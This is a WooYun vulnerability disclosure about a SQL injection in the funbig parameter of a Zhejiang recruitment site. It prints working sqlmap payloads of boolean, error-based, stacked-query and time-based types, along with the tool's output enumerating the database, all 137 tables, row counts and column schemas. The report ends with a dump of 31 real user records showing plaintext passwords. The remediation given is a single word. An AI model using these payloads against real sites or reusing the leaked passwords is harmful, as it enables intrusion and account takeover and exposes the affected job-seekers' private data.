当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143903

漏洞标题:浙江某人才网某处注入漏洞(导致30W个人信息泄露+账号+密码+邮箱等)

相关厂商:浙江某人才网

漏洞作者: 路人甲

提交时间:2015-09-28 16:16

修复时间:2015-11-12 16:18

公开时间:2015-11-12 16:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

浙江某人才网某处注入漏洞(导致30W个人信息泄露+账号+密码+邮箱等)

详细说明:

发现有进160万记录+30万个人信息+内部员工帐号+企业邮箱帐号密码,其中有腾讯和163的邮箱。。。。好6的说。。。。
Database: jobhost
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| job_accessing | 1619907 |
| job_person_logs | 320695 |
| job_person | 307885 |
链接:http://m.125job.com/hangye/index?funbig=2174

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: funbig
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: funbig=2174) AND 1687=1687 AND (7297=7297
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: funbig=2174) AND (SELECT 4546 FROM(SELECT COUNT(*),CONCAT(0x3a78616
13a,(SELECT (CASE WHEN (4546=4546) THEN 1 ELSE 0 END)),0x3a6861773a,FLOOR(RAND(0
)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7841=7841
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: funbig=2174); SELECT SLEEP(5);--
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: funbig=2174) AND SLEEP(5) AND (3890=3890
---
[15:18:59] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
[15:18:59] [INFO] testing if current user is DBA
[15:18:59] [INFO] fetching current user
[15:18:59] [WARNING] reflective value(s) found and filtering out
[15:18:59] [INFO] retrieved: 125job2@localhost
available databases [2]:
[*] information_schema
[*] jobhost
database management system users [1]:
[*] '125job2'@'localhost'
database management system users privileges:
[*] '125job2'@'localhost' [1]:
    privilege: USAGE
Database: jobhost
[137 tables]
+---------------------------+
| duo_baoming               |
| duo_card_list             |
| duo_helps                 |
| duo_invest                |
| duo_job_corporation_ok    |
| duo_jobs_topset           |
| duo_jobs_visited          |
| duo_log_editcorbase       |
| duo_manage_radio          |
| duo_pinlun                |
| duo_qqapi                 |
| duo_sitejob_list          |
| duo_sms_log               |
| duo_taobao_pic            |
| duo_temp_persone          |
| duo_weiboapi              |
| huodong_guaguale_list     |
| huodong_jinli             |
| huodong_sevenyear         |
| huodong_snakeyearp        |
| huodong_turntable         |
| huodong_weijianli         |
| job_accessing             |
| job_adposition            |
| job_adservice             |
| job_advertise             |
| job_advertisepos          |
| job_age                   |
| job_age_job               |
| job_age_person            |
| job_application           |
| job_apprise               |
| job_class                 |
| job_com_tel               |
| job_com_viseted           |
| job_comment               |
| job_corporation           |
| job_corporation_basis     |
| job_corporation_giveuplog |
| job_corporation_groups    |
| job_corporation_jobs      |
| job_corporation_logins    |
| job_corporation_manager   |
| job_corporation_message   |
| job_corporation_pic       |
| job_corporation_plan      |
| job_corporation_sale      |
| job_corporation_sale_hr   |
| job_corporation_search    |
| job_corporation_services  |
| job_corporation_sms       |
| job_corporation_smspaylog |
| job_corporation_visited   |
| job_datum                 |
| job_en_person             |
| job_gbooks                |
| job_giveuplog             |
| job_hh_case               |
| job_hh_corporation_job    |
| job_hh_person             |
| job_investigate           |
| job_ip                    |
| job_jobscomplain          |
| job_jobscontent_example   |
| job_journal               |
| job_links                 |
| job_mail                  |
| job_mail_host             |
| job_mailorder             |
| job_manager               |
| job_mayun_entry           |
| job_mayun_prefix          |
| job_mayun_reply           |
| job_msg                   |
| job_news                  |
| job_news_special          |
| job_notice                |
| job_oa_corporation        |
| job_oa_gbook              |
| job_person                |
| job_person_ability        |
| job_person_authenticate   |
| job_person_basis          |
| job_person_book           |
| job_person_card           |
| job_person_corporationtag |
| job_person_edu            |
| job_person_education      |
| job_person_expand         |
| job_person_file           |
| job_person_garner         |
| job_person_general        |
| job_person_haswork        |
| job_person_integral_goods |
| job_person_integral_log   |
| job_person_intention      |
| job_person_jifen          |
| job_person_job            |
| job_person_journal        |
| job_person_letter         |
| job_person_logs           |
| job_person_mailorder      |
| job_person_manager_merge  |
| job_person_merge          |
| job_person_pugong         |
| job_person_refurbish      |
| job_person_remark         |
| job_person_search         |
| job_person_spending       |
| job_person_training       |
| job_person_work           |
| job_pinyin_keywords       |
| job_pseron_otherinfo      |
| job_search                |
| job_sitejob               |
| job_sitejoblog            |
| job_statistics            |
| job_tag                   |
| job_tagged                |
| job_talent                |
| job_viewlogperson         |
| job_weather               |
| job_web_var               |
| job_wei                   |
| job_windows               |
| job_wish                  |
| job_worker                |
| job_zhaoping_live         |
| job_zhuanchang            |
| person_integral           |
| temp_hdlvyou              |
| weixin_binding            |
| weixin_config             |
| weixin_keyword            |
| weixin_login              |
| weixin_qlmcard            |
| zhuangpan_person          |
+---------------------------+


1.png


2.png


3.PNG


漏洞证明:

Database: jobhost
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| job_accessing             | 1619907 |
| job_person_logs           | 320695  |
| job_person                | 307885  |
| job_person_manager_merge  | 306848  |
| job_person_basis          | 292682  |
| job_person_intention      | 286649  |
| job_corporation_giveuplog | 276996  |
| job_person_ability        | 253661  |
| job_corporation_logins    | 206672  |
| job_com_viseted           | 204679  |
| job_talent                | 204406  |
| duo_sms_log               | 185680  |
| duo_jobs_visited          | 152808  |
| job_statistics            | 147773  |
| huodong_turntable         | 130973  |
| job_apprise               | 103574  |
| job_corporation_manager   | 100503  |
| job_person_work           | 85957   |
| job_corporation_groups    | 79777   |
| job_corporation           | 71855   |
| job_corporation_jobs      | 71760   |
| job_corporation_basis     | 71592   |
| job_oa_corporation        | 67143   |
| job_person_edu            | 64781   |
| job_giveuplog             | 47832   |
| duo_job_corporation_ok    | 47802   |
| job_person_garner         | 46512   |
| job_news                  | 46036   |
| job_search                | 34030   |
| job_person_integral_log   | 33681   |
| person_integral           | 27776   |
| duo_qqapi                 | 22842   |
| job_corporation_sale      | 18922   |
| job_corporation_visited   | 17577   |
| job_pinyin_keywords       | 13501   |
| job_person_pugong         | 13124   |
| job_person_letter         | 11259   |
| job_person_card           | 9999    |
Database: jobhost
Table: job_person
[34 columns]
+------------------------+--------------+
| Column                 | Type         |
+------------------------+--------------+
| chang_time             | int(8)       |
| chang_time_en          | int(8)       |
| click                  | int(4)       |
| datasource             | int(1)       |
| en_integrated          | int(2)       |
| en_status              | tinyint(3)   |
| have_en_resume         | smallint(1)  |
| id                     | int(12)      |
| integrated             | int(2)       |
| lock                   | smallint(1)  |
| log_count              | int(4)       |
| log_ip                 | varchar(32)  |
| log_time               | int(8)       |
| mail                   | varchar(127) |
| mailsendtime           | int(10)      |
| managerid              | int(14)      |
| myscore                | int(11)      |
| myweight               | int(11)      |
| password               | varchar(32)  |
| person_virtuosity      | smallint(1)  |
| person_virtuosity_show | smallint(1)  |
| person_virtuosity_time | int(8)       |
| photo                  | varchar(127) |
| photo_show             | smallint(1)  |
| post_basis             | smallint(1)  |
| post_intention         | smallint(1)  |
| recommend_time         | int(8)       |
| reg_time               | int(8)       |
| secrecy                | smallint(1)  |
| secrecy_corporation    | varchar(127) |
| user                   | varchar(32)  |
| userid                 | int(12)      |
| webtype                | tinyint(3)   |
| webuser                | varchar(50)  |
+------------------------+--------------+
Database: jobhost
Table: job_person_manager_merge
[42 columns]
+------------------------+---------------------+
| Column                 | Type                |
+------------------------+---------------------+
| area                   | int(4)              |
| area_1                 | int(4)              |
| area_1_big             | int(11)             |
| area_2                 | int(4)              |
| area_3                 | int(4)              |
| birthday               | int(8)              |
| birthplace             | int(4)              |
| chang_time             | int(8)              |
| click                  | int(4)              |
| degree                 | int(4)              |
| earnings               | varchar(100)        |
| earnings_2             | smallint(6)         |
| en_integrated          | int(2)              |
| fun_str                | varchar(50)         |
| id                     | int(12)             |
| integrated             | int(2)              |
| is_exec                | smallint(1)         |
| job_function_1         | int(4)              |
| job_function_1_big     | int(1)              |
| job_function_2         | int(4)              |
| job_function_2_big     | int(4)              |
| job_function_3         | int(4)              |
| job_function_3_big     | int(4)              |
| job_time               | int(8)              |
| lock                   | smallint(1)         |
| log_count              | int(4)              |
| log_time               | int(8)              |
| myscore                | int(11)             |
| myweight               | int(11)             |
| name                   | varchar(64)         |
| person_virtuosity_show | tinyint(3) unsigned |
| photo                  | varchar(127)        |
| photo_show             | smallint(1)         |
| post_basis             | smallint(1)         |
| post_intention         | smallint(1)         |
| recommend_time         | int(8)              |
| reg_time               | int(8)              |
| secrecy                | smallint(1)         |
| sex                    | smallint(1)         |
| string_job_function    | varchar(72)         |
| userid                 | int(12)             |
| work_month             | int(2)              |
+------------------------+---------------------+
Database: jobhost
Table: job_person
[31 entries]
+-----------+---------+------------------------+---------+--------------+
| managerid | user    | mail                   | webuser | password     |
+-----------+---------+------------------------+---------+--------------+
| 0         | <blank> | [email protected]        | NULL    | design       |
| 0         | <blank> | [email protected]           | NULL    | 123456       |
| 0         | <blank> | [email protected]        | NULL    | 123123       |
| 0         | <blank> | [email protected]        | NULL    | 811019       |
| 0         | <blank> | [email protected]       | NULL    | 316276ykc520 |
| 0         | <blank> | [email protected]     | NULL    | 19851015     |
| 0         | <blank> | [email protected]       | NULL    | 8011021      |
| 0         | <blank> | [email protected]      | NULL    | 8812345      |
| 0         | <blank> | [email protected] | NULL    | 123456       |
| 0         | <blank> | [email protected]       | NULL    | 781127       |
| 0         | <blank> | [email protected]    | NULL    | 5354208      |
| 0         | <blank> | [email protected]      | NULL    | 654321       |
| 0         | <blank> | [email protected]    | NULL    | 4199087      |
| 0         | <blank> | [email protected]      | NULL    | 13902202     |
| 0         | <blank> | [email protected]        | NULL    | 850615       |
| 0         | <blank> | [email protected]       | NULL    | 19850803     |
| 0         | <blank> | [email protected]       | NULL    | 242490       |
| 0         | <blank> | [email protected]           | NULL    | xu123456     |
| 0         | <blank> | [email protected]       | NULL    | 890077       |
| 0         | <blank> | [email protected] | NULL    | 343206       |
| 0         | <blank> | [email protected]    | NULL    | 136584123    |
| 0         | <blank> | [email protected]  | NULL    | azj19870831  |
| 0         | <blank> | [email protected]        | NULL    | 6590286      |
| 0         | <blank> | [email protected]       | NULL    | hyf17956106  |
| 0         | <blank> | [email protected]       | NULL    | 931936       |
| 0         | <blank> | <blank>                | NULL    | 200012       |
| 0         | <blank> | [email protected]     | NULL    | chenhongmiao |
| 0         | <blank> | 163`com                | NULL    | 7654321      |
| 0         | <blank> | 163.com                | NULL    | 87654321     |
| 0         | <blank> | <blank>                | NULL    | 123456       |
| 0         | <blank> | [email protected]        | NULL    | 781124       |
+-----------+---------+------------------------+---------+--------------+


4.png


5.png


6.png


修复方案:

过滤。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝